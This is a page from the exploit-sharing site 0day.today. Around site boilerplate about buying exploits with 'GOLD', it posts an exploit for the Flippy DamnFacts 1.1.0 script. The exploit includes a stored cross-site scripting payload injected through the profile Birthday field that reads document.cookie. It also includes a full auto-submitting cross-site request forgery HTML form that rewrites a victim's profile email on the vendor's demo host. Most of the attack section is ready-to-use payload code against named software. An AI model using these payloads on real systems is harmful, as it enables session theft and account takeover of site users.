0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - XSS / CSRF Vulnerabilities
# Exploit Title: Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent cross site scripting / Cross site request forgery # Exploit Author: borna nematzadeh (L0RD) # Vendor Homepage: https://www.codegrape.com/item/flippy-damnfacts-viral-fun-facts-sharing-script/3630 # Version: 1.1.0 # Tested on: Kali linux # POC 1 : Persistent Cross site scripting : 1) After creating an account , navigate to "Edit profile" . 2) Put this payload into the "Birthday" and save changes : " onmouseover=alert(document.cookie) " 3) You will have an alert box in the page . # POC 2 : Cross site request forgery : <html> <head> <title>CSRF POC</title> </head> <body> <form action="http://damnfacts.flippydemos.com/submit_profile.php" method="POST"> <input type="hidden" name="sex" value="Male" /> <input type="hidden" name="birthday" value="test" /> <input type="hidden" name="uEmail" value="ninjaassassinbn@yahoo.com" /> <input type="hidden" name="country" value="United States" /> <input type="hidden" name="about" value="test" /> </form> <script> document.forms[0].submit(); // profile will be updated successfully. </script> </body> </html> # 0day.today [2024-11-16] #